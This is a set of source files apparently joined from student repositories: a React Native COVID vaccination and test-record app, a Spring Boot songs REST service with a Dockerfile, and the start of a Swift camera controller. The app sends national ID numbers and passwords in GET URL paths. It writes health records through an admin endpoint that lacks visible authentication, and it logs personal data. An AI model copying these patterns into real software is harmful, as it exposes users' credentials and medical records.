// const [residence, setResidence] = useState("");
const [address, setAddress] = useState("");
const [phone, setPhone] = useState("");
const [visible, setVisible] = useState(false);
const [showProfile, setShowProfile] = useState(false);
const [hash, setHash] = useState("");
const [vaccinated, setVaccinated] = useState(0);
const [vaccineResults, setVaccineResult] = useState([]);
const [testResults, setTestResult] = useState([]);
const [lastResult, setLastResult] = useState(false);
const [tested, setTested] = useState(0);
const [vaccHash, setVaccHash] = useState([])
const [TestHash, setTestHash] = useState([])
  const [nearby_pos, setNearbyPos] = useState(false);
  const [errorMsg, setErrorMsg] = useState(""); // holds the location-permission error message used in the check below
// RNLocation.configure({
// distanceFilter: 1.0, // Meters
// desiredAccuracy: {
// ios: "best",
// android: "highAccuracy"
// },
// })
const toggleOverlay = () => {
setVisible(!visible);
};
const toggleProfile = () => {
setShowProfile(!showProfile);
};
// var profile = {
// Seed: seed,
// FirstName: fname,
// LastName: sname,
// Email: email,
// DateOfBirth: dob,
// GovernmentID: idnum,
// ResidentialAddress: address,
// ContactNumber: phone,
// };
var profile = {
address: iAddress
}
useEffect(() => {
(async () => {
try {
let { status } = await Location.requestPermissionsAsync();
if (status !== 'granted') {
setErrorMsg('Permission to access location was denied');
return;
}
var local_seed = await AsyncStorage.getItem("seed");
var local_info = await AsyncStorage.getItem("seedInfo");
var iadd = await AsyncStorage.getItem("address");
setSeed(local_seed);
setSeedInfo(local_info);
setIAddress(iadd);
var obj_info = JSON.parse(local_info);
console.log("Local Info = ", obj_info);
setEmail(obj_info.Profile.email);
setFname(obj_info.Profile.fname);
setSname(obj_info.Profile.sname);
setDOB(obj_info.Profile.dob);
// setPlaceOfBirth(await AsyncStorage.getItem("birth"));
// setNationality(await AsyncStorage.getItem("nationality"));
// setResidence(await AsyncStorage.getItem("residence"));
setAddress(obj_info.Profile.address);
setIDnum(obj_info.Profile.idnum);
setPhone(obj_info.Profile.phone);
console.log("Patient Address = ", iadd);
let vaccinationArray = [];
var vaccineResult = await fetch(`https://itrace-middleware.herokuapp.com/getAllHash/${iadd}&0&VACCINATION`);
vaccineResult = await vaccineResult.json();
console.log("Vaccination Result =", vaccineResult);
if (vaccineResult != false) {
for (var i = 0; i < vaccineResult.length; i++) {
var responseTx = await fetch(`https://itrace-middleware.herokuapp.com/getTx/${vaccineResult[i].toString()}`);
var resObjTx = await responseTx.json();
if (resObjTx.response !== false) {
console.log(resObjTx.response)
vaccinationArray.push(resObjTx.response)
}
}
setVaccHash(vaccineResult)
setVaccinated(1);
setVaccineResult(vaccinationArray);
} else {
setVaccinated(2);
}
var testArray = [];
var testResult = await fetch(
`https://itrace-middleware.herokuapp.com/getAllHash/${iadd}&0&COVIDTEST`
);
testResult = await testResult.json();
console.log("Tests Result =", testResult);
if (testResult != false) {
for (var i = 0; i < testResult.length; i++) {
var responseTx = await fetch(`https://itrace-middleware.herokuapp.com/getTx/${testResult[i].toString()}`);
var resObjTx = await responseTx.json();
if (resObjTx.response !== false) {
console.log(resObjTx.response)
testArray.push(resObjTx.response)
}
}
setTestHash(testResult);
setTested(1);
setTestResult(testArray);
var last = testArray[0];
// var status = JSON.parse(last.message);
console.log("Status = ", last);
setLastResult(last.result);
} else setTested(2);
// cons
let loc = await Location.getCurrentPositionAsync({accuracy: Location.LocationAccuracy.BestForNavigation});
console.log("Location = ", loc);
let locArr = [loc.coords.longitude, loc.coords.latitude];
setLocation(locArr);
var addLoc = await fetch(`https://itrace-middleware.herokuapp.com/addLocation/${local_seed}&${loc.coords.longitude}&${loc.coords.latitude}`);
var nearbyLoc = await fetch(`https://itrace-middleware.herokuapp.com/getAllLocations/${local_seed}`);
nearbyLoc = await nearbyLoc.json();
console.log("Nearby Location Result = ", nearbyLoc);
if(nearbyLoc != false)
setNearbyPos(true)
} catch (e) {
console.log("Error in Final Catch = ", e);
}
})();
}, []);
return (
<View style={styles.container}>
{/* <View style={{position:'relative', top:0, flexDirection:'row', width:'100%', marginBottom:20}}>
<View style={{position:"absolute", right:5}}>
<Button
icon={
<Icon
name="user"
size={20}
color="#2E86C1"
solid
style={{marginLeft:5}}
/>
}
iconRight
buttonStyle={{width:100, backgroundColor:'#E1E9EA', }}
title="Profile"
titleStyle={{color:'#2E86C1'}}
onPress={() => setShowProfile(true)}
></Button>
</View>
</View> */}
{/* <View style={{zIndex:1, width:'100%'}}> */}
{/* <ScrollView horizontal={false} showsVerticalScrollIndicator={true} style={{zIndex:1, width:'100%'}}> */}
<Text style={[styles.text, {fontSize:30}]}>Hello {fname} !</Text>
<Text style={[styles.text, {fontSize:20, color: (tested==1)&&(!lastResult) ? "#229954":"#C0392B"}]}>You Are {(tested==1)&&(!lastResult) ? "": "NOT"} Eligible For Plasma Donation</Text>
<Text style={[styles.text, {fontSize:20, color: (nearby_pos) ? "#C0392B":"#229954"}]}>
{nearby_pos ? "There Might Be A COVID Patient Around Your. Wear Your Mask" : "There is No COVID Positive Around You"}
</Text>
<View
style={styles.infoContainer}
>
<Text
style={{
position: "relative",
left: 10,
top: 10,
marginBottom: 0,
color:'white',
fontWeight: "600",
}}
>
VACCINATION STATUS
</Text>
<Divider style={styles.mainDivider} />
<View style={{ margin: "auto", marginTop: 20 }}>
<Icon
name= {(vaccinated === 1 || vaccinated === 2) ? "syringe" : "spinner"}
size={30}
color={(vaccinated === 1) ? "#1E8449" : ((vaccinated === 2) ? "#CB4335" : "#F1C40F")}
solid
style={{ position: "absolute", right: 0 }}
/>
<Text
style={[
styles.text,
{ color: (vaccinated === 1) ? "#1E8449" : ((vaccinated === 2) ? "#CB4335" : "#F1C40F"), position: "relative", textAlign:'left', left: 0, fontWeight: "700", },
]}
>
            {(vaccinated === 1) ? `You are\nVaccinated` : ((vaccinated === 2) ? `You are\nNOT Vaccinated` : `Checking Vaccination\nStatus`)}
</Text>
{(vaccinated === 1) && <Text
style={[
styles.text,
{ color: "#229954", position: "relative", textAlign:'left', fontSize: 10 },
]}
>
Address = {vaccHash[0]}
</Text>}
</View>
</View>
{/* COVID TEST BOX */}
<View
style={styles.infoContainer}
>
<Text
style={{
position: "relative",
left: 10,
top: 10,
marginBottom: 0,
color:'white',
fontWeight: "600",
}}
>
TEST STATUS
</Text>
<Divider style={styles.mainDivider} />
<View style={{ margin: "auto", marginTop: 20 }}>
<Icon
name={(tested === 0) ? 'spinner' : ((tested === 1) ? (lastResult ? "virus" : "virus-slash") : "times-circle")}
size={30}
color={(tested === 0) ? '#F1C40F' : ((tested === 1) ? (lastResult ? "#E74C3C" : "#27AE60") : "#CB4335")}
solid
style={{ position: "absolute", right: 0 }}
/>
<Text
style={[
styles.text,
{
fontWeight: "700",
// fontSize: 20,
color: (tested === 0) ? '#F1C40F' : ((tested === 1) ? (lastResult ? "#E74C3C" : "#27AE60") : "#CB4335"),
position: "relative", textAlign:'left', left:0
},
]}
>
{(tested === 0) ? `Checking Your\nTest Status` : ((tested === 1) ? (lastResult ? `Positive\nCOVID Result` : `Negative\nCOVID Result`) : `Not Taken\nTest Yet`)}
</Text>
{(tested === 1) &&<Text
style={[
styles.text,
{ color: "#229954", position: "relative", textAlign:'left', fontSize: 10, },
]}
>
Address = {TestHash[0]}
</Text>}
</View>
</View>
<View>
<View style={{ height: 20 }}></View>
<View style={styles.btnContainer}>
<Button
title="Show My QR"
icon={
<Icon
name="qrcode"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
onPress={toggleOverlay}
buttonStyle={[
styles.button,
{ marginBottom:20 },
]}
/>
<Button
icon={
<Icon
name="user"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
buttonStyle={[styles.button, { marginBottom:20 }]}
title="My Profile"
// titleStyle={{color:'#2E86C1'}}
onPress={() => setShowProfile(true)}
></Button>
<Button
icon={
<Icon
name="sign-out-alt"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
buttonStyle={[styles.button, {backgroundColor:'#C0392B'}]}
title="Logout"
// titleStyle={{color:'#2E86C1'}}
onPress={async() => {
await AsyncStorage.clear();
navigation.navigate("Welcome")
}}
></Button>
{/* <Button
title="Scan QR Code"
icon={
<Icon
name="search"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
onPress={() => navigation.navigate("Scan")}
buttonStyle={styles.button}
/> */}
</View>
<Divider style={styles.mainDivider} />
<View style={{ height: 20 }}></View>
<Overlay isVisible={visible} onBackdropPress={toggleOverlay}>
<QRCode logoSize={400} value={JSON.stringify(profile)} />
</Overlay>
{/* <Button
title="Authority Mode"
icon={
<Icon
name="exchange-alt"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
onPress={() => navigation.navigate("AddRecord")}
buttonStyle={styles.button}
/> */}
<Overlay isVisible={showProfile} onBackdropPress={toggleProfile} >
          <View style={[styles.container, {backgroundColor: '#1F618D', padding:50}]}>
<Text style={[styles.subtext]}>Name</Text>
<Text style={styles.text}>
{fname} {sname}
</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Email</Text>
<Text style={styles.text}>{email}</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Date Of Birth</Text>
<Text style={styles.text}>{dob}</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Government ID</Text>
<Text style={styles.text}>{idnum}</Text>
<Divider style={styles.mainDivider} />
{/* <Text style={styles.subtext}>Place Of Birth</Text>
<Text style={styles.text}>{placeofbirth}</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Nationality</Text>
<Text style={styles.text}>{nationality}</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Country of Residence</Text>
<Text style={styles.text}>{residence}</Text>
<Divider style={styles.mainDivider} /> */}
<Text style={styles.subtext}>Address</Text>
<Text style={styles.text}>{address}</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Phone Number</Text>
<Text style={styles.text}>{phone}</Text>
</View>
</Overlay>
{/* */}
</View>
{/* </ScrollView> */}
{/* </View> */}
</View>
);
};
const styles = StyleSheet.create({
container: {
flex: 1,
backgroundColor: "#2C3E50",
alignItems: "center",
justifyContent: "center",
margin:'auto',
// paddingTop: 50,
paddingHorizontal: 0,
borderWidth: 0,
borderColor: "#273157",
},
btnContainer: {
flexDirection: "column",
alignSelf: "center",
marginBottom: 20,
},
button: {
backgroundColor: "#2980B9",
color: "white",
width: 250,
height:40,
margin: 5,
alignSelf:'center',
borderRadius: 90,
borderWidth: 2,
borderColor: "white",
},
btnText:{
position:'absolute',
left:20
},
text: {
// fontFamily: "Varela",
color: "#F0F3F4",
textAlign: "center",
fontSize: 20,
},
subtext: {
// fontFamily: "Metropolis",
color: "gray",
textAlign: "left",
fontSize: 20,
fontWeight: "bold",
},
image: {
position:'absolute',
bottom: 0,
width: "100%",
height: 100,
zIndex:0
// alignSelf: "center",
// marginBottom: 50,
},
subDivider: {
backgroundColor: "gray",
marginVertical: 10,
height: 2,
width: 200,
alignSelf: "center",
opacity: 0.1,
},
mainDivider: {
backgroundColor: "gray",
marginTop: 10,
height: 2,
width: "90%",
alignSelf: "center",
},
infoContainer: {
// marginHorizontal: 0,
borderWidth: 2,
borderColor: "#27AE60",
borderRadius: 20,
marginTop:20,
marginHorizontal:20,
width:'90%',
paddingHorizontal:20,
paddingBottom:20,
// flexDirection: "column",
}
});
<file_sep>import React, { useRef, useEffect, useState } from "react";
import { Animated, Text, View, Image, StyleSheet } from "react-native";
import { Input, Button } from "react-native-elements";
import { AppLoading } from "expo";
import { useFonts } from "expo-font";
import AsyncStorage from "@react-native-async-storage/async-storage";
import Icon from "react-native-vector-icons/FontAwesome5";
import Spinner from "react-native-loading-spinner-overlay";
// You can then use your `FadeInView` in place of a `View` in your components:
export default ({ navigation }) => {
const [processing, setProcessing] = useState(false);
const [cnic, setCnic] = useState("");
const [password, setPassword] = useState("");
const getData = async () => {
try {
const localEmail = await AsyncStorage.getItem("email");
const localPass = await AsyncStorage.getItem("password");
if (
localEmail !== null &&
localPass !== null &&
        localEmail === cnic &&
localPass === password
) {
return true;
} else {
return false;
}
} catch (e) {
console.log("Error in Getting Data");
}
};
const loginBtn = async () => {
try {
setProcessing(true);
var seed = await fetch(
`https://itrace-middleware.herokuapp.com/getSeed/${cnic}&${password}`
);
var parsedSeed = await seed.json();
if (parsedSeed[0]) {
await AsyncStorage.setItem("seed", parsedSeed[1].SEED);
await AsyncStorage.setItem("seedInfo", JSON.stringify(parsedSeed[1]));
var doctorAddress = await fetch(
`https://itrace-middleware.herokuapp.com/getAlphaAddress/${parsedSeed[1].SEED}`
);
doctorAddress = await doctorAddress.json();
await AsyncStorage.setItem("address", doctorAddress.ADDRESS);
setProcessing(false);
navigation.navigate("Home");
} else {
setProcessing(false)
alert("Login Failed");
}
} catch (e) {
setProcessing(false);
alert("Error While Loggin In");
console.log("Error in Logging In ", e);
}
};
return (
<View style={styles.container}>
<Spinner
visible={processing}
textStyle={[styles.text, { color: "white" }]}
textContent={"Please Wait while You Are Logged In"}
/>
<Text
style={[
styles.text,
{
fontSize: 20,
fontWeight: "700",
position: "absolute",
top: 50,
},
]}
>
Please Fill Below Information
</Text>
<View style={{ zIndex: 1, width: "80%" }}>
<Input
placeholder="CNIC Without Dashes"
keyboardType="numeric"
label="CNIC"
onChangeText={(value) => setCnic(value)}
style={styles.input}
/>
<Input
label="Password"
placeholder="<PASSWORD>"
style={styles.input}
secureTextEntry={true}
onChangeText={(value) => setPassword(value)}
/>
<Button
icon={
<Icon
name="sign-in-alt"
size={20}
color="white"
solid
style={{ position: "absolute", right: 20 }}
/>
}
iconRight
buttonStyle={[styles.button, { alignSelf: "center" }]}
title="Login"
onPress={async () => await loginBtn()}
></Button>
</View>
</View>
);
};
const styles = StyleSheet.create({
container: {
flex: 1,
backgroundColor: "#2C3E50",
alignItems: "center",
justifyContent: "center",
margin:'auto',
paddingTop: 0,
paddingHorizontal: 0,
borderWidth: 0,
borderColor: "#273157",
zIndex:2
},
image: {
position: "absolute",
bottom: 0,
width: "100%",
height: 100,
zIndex: 0,
},
button: {
backgroundColor: "#196F3D",
color: "white",
width: 150,
height:40,
margin: 5,
borderRadius: 90,
borderWidth: 2,
borderColor: "#52BE80",
},
btnText:{
position:'absolute',
left:20
},
text: {
// fontFamily: "Varela",
color: "#F0F3F4",
textAlign: "center",
fontSize: 20,
},
input: {
borderRadius: 90,
borderColor: "#D3D4D5",
borderWidth: 2,
paddingHorizontal: 10,
marginBottom: 10,
},
});
<file_sep>import React, { useRef, useEffect } from 'react';
import { Animated, Text, View, Image, StyleSheet} from 'react-native';
import { Card, ListItem, Button, Icon } from "react-native-elements";
import { AppLoading } from 'expo';
import { useFonts } from 'expo-font';
// You can then use your `FadeInView` in place of a `View` in your components:
export default ({navigation}) => {
let [fontsLoaded] = useFonts({
// Load a font `Montserrat` from a static resource
'Righteous': require('./../assets/fonts/Righteous-Regular.ttf'),
'Secular': require('./../assets/fonts/SecularOne-Regular.ttf'),
'Nunito': require('./../assets/fonts/Nunito-Regular.ttf'),
'Poppins': require('./../assets/fonts/Poppins-Regular.ttf'),
'NunitoBold': require('./../assets/fonts/Nunito-Bold.ttf'),
'PoppinsBold': require('./../assets/fonts/Poppins-Bold.ttf'),
'NunitoBlack': require('./../assets/fonts/Nunito-Black.ttf'),
'PoppinsBlack': require('./../assets/fonts/Poppins-Black.ttf'),
'MetropolisBlack': require('./../assets/fonts/Metropolis-Black.otf'),
'MetropolisBold': require('./../assets/fonts/Metropolis-Bold.otf'),
'MetropolisSemiBold': require('./../assets/fonts/Metropolis-SemiBold.otf'),
'Metropolis': require('./../assets/fonts/Metropolis-Regular.otf'),
});
  if (!fontsLoaded) {
    return <AppLoading />;
  }
  return (
    <View style={styles.container}>
      <View style={styles.text}>
        <Text style={[styles.text, { fontWeight: "900", fontSize: 30 }]}>Profile</Text>
      </View>
    </View>
  );
}
const styles = StyleSheet.create({
container: {
flex: 1,
backgroundColor: "#2C3E50",
alignItems: "center",
justifyContent: "center",
margin:'auto',
paddingTop: 0,
paddingHorizontal: 0,
borderWidth: 0,
borderColor: "#273157",
zIndex:2
},
button: {
backgroundColor: "#196F3D",
color: "white",
width: 150,
height:40,
margin: 5,
borderRadius: 90,
borderWidth: 2,
borderColor: "#52BE80",
},
btnText:{
position:'absolute',
left:20
},
text: {
// fontFamily: "Varela",
color: "#F0F3F4",
textAlign: "center",
fontSize: 20,
},
image:{
flex: 1,
width: undefined,
height: undefined
}
});<file_sep>import React, { useRef, useEffect, useState } from "react";
import { Animated, Text, View, Image, StyleSheet } from "react-native";
import { Input, Button } from "react-native-elements";
import { AppLoading } from "expo";
import { useFonts } from "expo-font";
import AsyncStorage from '@react-native-async-storage/async-storage';
import { ScrollView } from "react-native-gesture-handler";
import Spinner from "react-native-loading-spinner-overlay";
import Icon from 'react-native-vector-icons/FontAwesome5';
// You can then use your `FadeInView` in place of a `View` in your components:
export default ({ navigation }) => {
const [vaccineeID, setVaccineeID] = useState('');
const [vaccinatorID, setvaccinatorID] = useState('');
const [testeeID, setTesteeID] = useState('');
const [testerID, setTesterID] = useState('');
const [location, setLocation] = useState('');
const [date, setDate] = useState('');
const [txType, setTxType] = useState('VACCINATION')
const [hasCovid, setHasCovid] = useState(false);
const [processing, setProcessing] = useState(false);
const addVaccine = async (key, value) => {
try {
setProcessing(true)
var msg = {"vaccineeID":vaccineeID, "vaccinatorID":vaccinatorID, "location":location, "txType":txType, "date":date};
msg = JSON.stringify(msg)
var iaddress = await fetch(
`https://itrace-middleware.herokuapp.com/getAddressAdmin/${vaccineeID}`
);
iaddress = await iaddress.json();
console.log("Patients Seed&Address", iaddress);
if(iaddress != false)
{
await fetch("https://itrace-middleware.herokuapp.com/sendTx", {
method: "POST",
body: JSON.stringify({
seed: iaddress[0],
address: iaddress[1],
txType: txType,
Data: msg
}),
headers: {
"Content-type": "application/json; charset=UTF-8"
}
})
}
setProcessing(false)
alert("Vaccination Record Added")
} catch (e) {
setProcessing(false)
console.log("Error API ", e)
}
}
const addTest = async (key, value) => {
try {
setProcessing(true)
var msg = {"testeeID":testeeID, "testerID":testerID, "location":location, "txType":txType, "date":date, "result": hasCovid};
msg = JSON.stringify(msg)
var iaddress = await fetch(
`https://itrace-middleware.herokuapp.com/getAddressAdmin/${testeeID}`
);
iaddress = await iaddress.json();
console.log("Patients Seed&Address", iaddress);
if(iaddress != false)
{
await fetch("https://itrace-middleware.herokuapp.com/sendTx", {
method: "POST",
body: JSON.stringify({
seed: iaddress[0],
address: iaddress[1],
txType: txType,
Data: msg
}),
headers: {
"Content-type": "application/json; charset=UTF-8"
}
})
}
setProcessing(false)
alert("Covid Test Record Added")
} catch (e) {
setProcessing(false)
console.log("Error API ", e)
}
}
return (
<View style={styles.container}>
<View style={{zIndex:1}}>
<ScrollView horizontal={false} showsVerticalScrollIndicator={true}>
<View style={{alignItems: 'center'}}>
<Spinner
visible={processing}
textStyle={[styles.text, {color:'white'}]}
textContent={"Please Wait while your record is being Added"}
/>
<Text style={[styles.text, { fontSize: 20 }]}>
Please Select The Record Type
</Text>
<View style={styles.btnContainer}>
<Button
buttonStyle={[styles.button, { width: 150, marginRight:5, backgroundColor: (txType === "VACCINATION") ? "#E1E9EA":"#154360", }]}
title="COVID Vaccine"
titleStyle={{ fontFamily: "MetropolisBold", color: (txType === "VACCINATION") ? "black":"white" }}
onPress={() => setTxType("VACCINATION")}
></Button>
<Button
buttonStyle={[styles.button, { width: 150, marginLeft:5, backgroundColor: (txType === "COVIDTEST") ? "#E1E9EA":"#154360" }]}
title="COVID Test"
titleStyle={{ fontFamily: "MetropolisBold", color: (txType === "COVIDTEST") ? "black":"white" }}
onPress={() => setTxType("COVIDTEST")}
></Button>
</View>
<Text style={[styles.text, { fontSize: 20, marginVertical:20 }]}>
{(txType === "VACCINATION") ? "Adding Record For COVID Vaccination" : "Adding Record For COVID Test"}
</Text>
{(txType === "VACCINATION") && <View style={{width: '100%'}}>
<Input style={styles.input} placeholder="CNIC of Patient" onChangeText={value => setVaccineeID(value)}/>
<Input style={styles.input} placeholder="ID of Vaccinator" onChangeText={value => setvaccinatorID(value)}/>
<Input style={styles.input} placeholder="Location" onChangeText={value => setLocation(value)}/>
<Input style={styles.input} placeholder="Date" onChangeText={value => setDate(value)}/>
</View>}
{(txType === "COVIDTEST") && <View style={{width: '100%'}}>
<Input style={styles.input} placeholder="CNIC of Patient" onChangeText={value => setTesteeID(value)}/>
<Input style={styles.input} placeholder="ID of Testing Entity" onChangeText={value => setTesterID(value)}/>
<Input style={styles.input} placeholder="Location" onChangeText={value => setLocation(value)}/>
<Input style={styles.input} placeholder="Date" onChangeText={value => setDate(value)}/>
<Text style={[styles.text, { fontSize: 20 }]}>Result</Text>
<View style={{marginVertical: 10, flexDirection: 'row', alignSelf:'center',}}>
<Button
buttonStyle={[styles.button, { width: 100, marginRight:5, borderColor:"#1C2833", backgroundColor: hasCovid ? "#E74C3C":"#CCD1D1" }]}
title="Positive"
titleStyle={{ fontFamily: "MetropolisBold" }}
onPress={() => setHasCovid(true)}
></Button>
<Button
buttonStyle={[styles.button, { width: 100, marginLeft:5, borderColor:"#1C2833", backgroundColor: hasCovid ? "#CCD1D1":"#1E8449" }]}
title="Negative"
titleStyle={{ fontFamily: "MetropolisBold" }}
onPress={() => setHasCovid(false)}
></Button>
</View>
</View>}
<Button
buttonStyle={[styles.button, {width:250}]}
title="Add Record"
icon={
<Icon
name="plus-circle"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
onPress={async () => {
try{
(txType === "VACCINATION") ? await addVaccine() : await addTest()
navigation.navigate("Welcome")
}catch(e){
alert("Error")
}
}}
></Button>
<View><Text></Text></View>
</View>
</ScrollView>
</View>
</View>
);
};
const styles = StyleSheet.create({
container: {
flex: 1,
backgroundColor: "#2C3E50",
alignItems: "center",
justifyContent: "center",
margin:'auto',
paddingTop: 0,
paddingHorizontal: 0,
borderWidth: 0,
borderColor: "#273157",
zIndex:2
},
button: {
backgroundColor: "#196F3D",
color: "white",
width: 150,
height:40,
margin: 5,
borderRadius: 90,
borderWidth: 2,
borderColor: "#52BE80",
},
btnText:{
position:'absolute',
left:20
},
text: {
// fontFamily: "Varela",
color: "#F0F3F4",
textAlign: "center",
fontSize: 20,
},
image: {
position:'absolute',
bottom: 0,
width: "100%",
height: 100,
zIndex:0
},
btnContainer: {
flexDirection: "row",
alignSelf: "center",
marginBottom: 20,
marginTop:20,
width:'100%',
padding:10,
backgroundColor:'#154360',
borderRadius:90
},
input: {
borderRadius:90,
borderColor: '#D3D4D5',
borderWidth:2,
paddingHorizontal:10,
marginBottom:10
},
});
|
440775f7e7e02e9bed04a55a33c4c672c9a2ec14
|
[
"JavaScript"
] | 4
|
JavaScript
|
NomanNasirMinhas/Itrace-App-React-Native
|
7db7e91f9751c18f2d832bf50ad134b329905684
|
047e0c8a8807973726af3434fc70aeb0fdcf554a
|
refs/heads/main
|
<repo_name>htw-kbe-wise2021/unicorn<file_sep>/src/main/java/com/kbe/unicorn/song/SongDto.java
package com.kbe.unicorn.song;
import javax.validation.constraints.NotBlank;
import javax.validation.constraints.NotNull;
import lombok.Data;
@Data
public class SongDto {
@NotBlank
private String title;
@NotBlank
private String label;
@NotNull
private Integer released;
@NotBlank
private String artist;
}
<file_sep>/src/main/java/com/kbe/unicorn/song/SongService.java
package com.kbe.unicorn.song;
import java.util.Collection;
import javax.transaction.Transactional;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpStatus;
import org.springframework.stereotype.Service;
import org.springframework.web.server.ResponseStatusException;
@Service
public class SongService {
@Autowired
SongRepository repo;
public SongEntity findById(long id) {
return repo.findById(id).orElseThrow(() -> new ResponseStatusException(HttpStatus.NOT_FOUND));
}
public Collection<SongEntity> findAll() {
return repo.findAll();
}
public SongEntity newSong(SongEntity song) {
return repo.save(song);
}
@Transactional
public void deleteById(long id) {
if (!repo.existsById(id)) {
throw new ResponseStatusException(HttpStatus.NOT_FOUND);
}
repo.deleteById(id);
}
}
<file_sep>/src/main/java/com/kbe/unicorn/song/SongController.java
package com.kbe.unicorn.song;
import java.util.Collection;
import javax.validation.Valid;
import org.modelmapper.ModelMapper;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.servlet.support.ServletUriComponentsBuilder;
@RestController
@RequestMapping("/songs")
public class SongController {
@Autowired
SongService service;
@Autowired
private ModelMapper modelMapper;
@GetMapping("/{id}")
public SongEntity one(@PathVariable long id) {
return service.findById(id);
}
@GetMapping()
public Collection<SongEntity> all() {
return service.findAll();
}
@PostMapping()
public ResponseEntity<Void> create(@RequestBody @Valid SongDto song) {
System.out.println(song);
var createdSong = service.newSong(convertToEntity(song));
var location = ServletUriComponentsBuilder
.fromCurrentRequest()
.path("/{id}")
.buildAndExpand(createdSong.getId())
.toUri();
return ResponseEntity.created(location).build();
}
@DeleteMapping("/{id}")
public ResponseEntity<Void> delete(@PathVariable long id) {
service.deleteById(id);
return ResponseEntity.noContent().build();
}
private SongDto convertToDto(SongEntity song) {
return modelMapper.map(song, SongDto.class);
}
private SongEntity convertToEntity(SongDto song) {
return modelMapper.map(song, SongEntity.class);
}
}
<file_sep>/src/main/resources/application.properties
server.servlet.contextPath=/songsservlet-unicorn
server.error.include-stacktrace=never<file_sep>/Dockerfile
# Build stage: Maven image with JDK 17 builds the application and a trimmed Java runtime
FROM maven:3-eclipse-temurin-17 AS MAVEN_ENV
# Assemble a minimal runtime with jlink containing only the modules the service needs
RUN $JAVA_HOME/bin/jlink \
    --add-modules java.base \
    --compress=2 \
    --add-modules jdk.jfr,jdk.management.agent,java.base,java.logging,java.xml,jdk.unsupported,java.sql,java.naming,java.desktop,java.management,java.security.jgss,java.instrument \
    --no-header-files \
    --no-man-pages \
    --strip-debug \
    --output /javaruntime
# Copy the sources and build the Spring Boot jar (tests are skipped to speed up image builds)
COPY pom.xml /tmp/
COPY src /tmp/src/
WORKDIR /tmp/
RUN mvn package -DskipTests=true
# Runtime stage: slim Debian base with only the custom runtime and the packaged jar
FROM debian:buster-slim
ENV JAVA_HOME=/opt/java/openjdk
ENV PATH "${JAVA_HOME}/bin:${PATH}"
COPY --from=MAVEN_ENV /javaruntime $JAVA_HOME
RUN mkdir /app
WORKDIR /app
COPY --from=MAVEN_ENV /tmp/target/unicorn-*.jar /app/app.jar
COPY exercises /app/exercises
EXPOSE 8080
ENTRYPOINT ["java", "-jar", "app.jar"]
package com.kbe.unicorn;
import io.swagger.v3.oas.annotations.OpenAPIDefinition;
import io.swagger.v3.oas.annotations.info.Info;
import io.swagger.v3.oas.annotations.servers.Server;
import org.modelmapper.ModelMapper;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
@OpenAPIDefinition(info = @Info(title = "Unicorn API", version = "1.0"),
servers = @Server(url = "/songsservlet-unicorn", description = "Magical API"))
@SpringBootApplication
public class UnicornApplication {
public static void main(String[] args) {
SpringApplication.run(UnicornApplication.class, args);
}
@Bean
public ModelMapper modelMapper() {
return new ModelMapper();
}
}
<file_sep>/README.md
# Komponentenbasierte Entwicklung
This repository contains our solutions to the assignments for the course Komponentenbasierte Entwicklung (component-based development) at the Hochschule für Technik und Wirtschaft Berlin.

## About us
[<NAME>](https://github.com/ZerNico)
s0573840
[<NAME>](https://github.com/Thorben0)
s0573288
|
0382df95bbea9be11fd09a3c0d02b9152f5841ec
|
[
"Markdown",
"Java",
"Dockerfile",
"INI"
] | 7
|
Java
|
htw-kbe-wise2021/unicorn
|
a39ba800e35cef858b0803320f872995da6102c2
|
2b8719b39e25204251d786e83602bdc31a7f5ba6
|
refs/heads/master
|
<file_sep>//
// CameraViewController.swift
// ocvCameraImage
//
// Created by <NAME> on 2014/09/20.
// Copyright (c) 2014 masanori. All rights reserved.
//
import UIKit
import AVFoundation
class CameraViewController: UIViewController, AVCaptureVideoDataOutputSampleBufferDelegate
{
@IBOutlet weak var btnCancel: UIBarButtonItem!
@IBOutlet weak var imgCameraView: UIImageView!
var cpsSession: AVCaptureSession!
//var videoDataOutputQueue: dispatch_queue_t!
var imcImageController: ImageController!
override func viewDidLoad()
{
super.viewDidLoad()
imcImageController = ImageController()
        // Initialize the image controller.
imcImageController.initImageController()
}
override func viewWillAppear(animated: Bool)
{
        // Prepare the camera for use
self.initCamera()
}
override func viewDidDisappear(animated: Bool)
{
self.cpsSession.stopRunning()
for output in self.cpsSession.outputs
{
self.cpsSession.removeOutput(output as! AVCaptureOutput)
}
for input in self.cpsSession.inputs
{
self.cpsSession.removeInput(input as! AVCaptureInput)
}
self.cpsSession = nil
}
override func didReceiveMemoryWarning() {
super.didReceiveMemoryWarning()
}
@IBAction func btnCancelTouched(sender: UIBarButtonItem)
{
self.dismissViewControllerAnimated(true, completion: nil)
}
func initCamera()
{
var cpdCaptureDevice: AVCaptureDevice!
        // Look for the back-facing camera
for device: AnyObject in AVCaptureDevice.devices()
{
if device.position == AVCaptureDevicePosition.Back
{
cpdCaptureDevice = device as! AVCaptureDevice
}
}
        // Return if no camera was found
        if (cpdCaptureDevice == nil) {
            println("Camera couldn't be found")
return
}
cpdCaptureDevice.activeVideoMinFrameDuration = CMTimeMake(1, 30)
        // Get the capture device input
